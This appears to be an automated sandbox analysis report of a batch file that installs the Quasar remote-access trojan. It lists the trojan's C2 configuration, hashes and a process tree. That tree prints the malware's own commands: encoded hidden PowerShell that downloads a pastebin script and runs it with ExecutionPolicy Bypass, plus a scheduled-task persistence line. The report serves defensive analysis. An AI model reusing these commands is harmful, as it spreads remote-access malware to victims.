Overview

overview

10

Static

static

1

install.bat

windows7-x64

8

install.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    35s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2024 07:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    install.bat

  • Size

    595B

  • MD5

    369f9a8a381c74880783423b98ed52c9

  • SHA1

    3bd04c343b1c361d4e9383010cb0be2380c3dbdb

  • SHA256

    c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d

  • SHA512

    a139d4d0a7d3f0f6a28690df219cb14adf6a4f0a7ff365bb1e8142ddf8be136ea919e44e4f3108d8fcf344031bff127c701d91b2949501e83d26fdbd6b746c7b

Score
10/10
quasaroffice04executionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

Dystopian-62863.portmap.host:62863

Mutex

e1de8f9b-5a7a-4798-a6fb-c03591ef3442

Attributes
  • encryption_key

    8C1BB32BFD240218BA0CB04D65341FB1FDE1E001

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SubStart

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

    execution
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\install.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\install.bat' -ArgumentList 'am_admin'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ASwBZAGQAUgByAFQAUwB4ACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAQQBtAC4AcABzADEA
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAEEAbQAuAHAAcwAxAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\Am.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:648
            • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
              "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2176
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "SubStart" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4852
              • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3244
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "SubStart" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1040

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    eaef2fd22964f0384c0786fe42e1bdf4

    SHA1

    f9c5f5a3862bc2b2ac880964b03461d3fe0a369c

    SHA256

    a848c493c132c070771c4c1fb73612fc322d63074c48476fbdce38d28fe451c8

    SHA512

    4fab0a6499eb2be406bfc67da714031e93c35d4d244d3e91c22fb7954e78d17a0523b911383f39debab2829591652e21244615164b1824a73302c733a5ea8846

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Am.ps1
    Filesize

    474B

    MD5

    26f3ed9427f9a33e13388303c4179845

    SHA1

    3cb3e6201b751e6aa020e90d816f10cb1e475969

    SHA256

    3a8da751f93c7ac6d49ba42a8b2562ac1a444f5ec7e6c08248a8072bc84f29ee

    SHA512

    336f23222b131f781111b0c5b2ee7d920932895e9ee4e8f50ce61ca0757fef3559a7ec408e80fe380e7354e8f3e87e0efa4afb25486a38febff607269df95f53

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
    Filesize

    3.1MB

    MD5

    e9a138d8c5ab2cccc8bf9976f66d30c8

    SHA1

    e996894168f0d4e852162d1290250dfa986310f8

    SHA256

    e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3

    SHA512

    5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14inttvj.1jt.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/648-68-0x0000026CA3FF0000-0x0000026CA4066000-memory.dmp

    Filesize

    472KB

    Download

  • memory/648-54-0x0000026CA3BA0000-0x0000026CA3BE4000-memory.dmp

    Filesize

    272KB

    Download

  • memory/1424-29-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1424-30-0x000001F3FF290000-0x000001F3FFA36000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/1424-34-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1424-27-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1424-28-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2176-67-0x00000000002A0000-0x00000000005C4000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/3244-75-0x000000001BAD0000-0x000000001BB20000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3244-80-0x000000001CB20000-0x000000001CB5C000-memory.dmp

    Filesize

    240KB

    Download

  • memory/3244-79-0x000000001C3A0000-0x000000001C3B2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3244-76-0x000000001C420000-0x000000001C4D2000-memory.dmp

    Filesize

    712KB

    Download

  • memory/3756-12-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3756-11-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3756-10-0x00000250F2660000-0x00000250F2682000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3756-15-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3756-0-0x00007FFB5E6D3000-0x00007FFB5E6D5000-memory.dmp

    Filesize

    8KB

    Download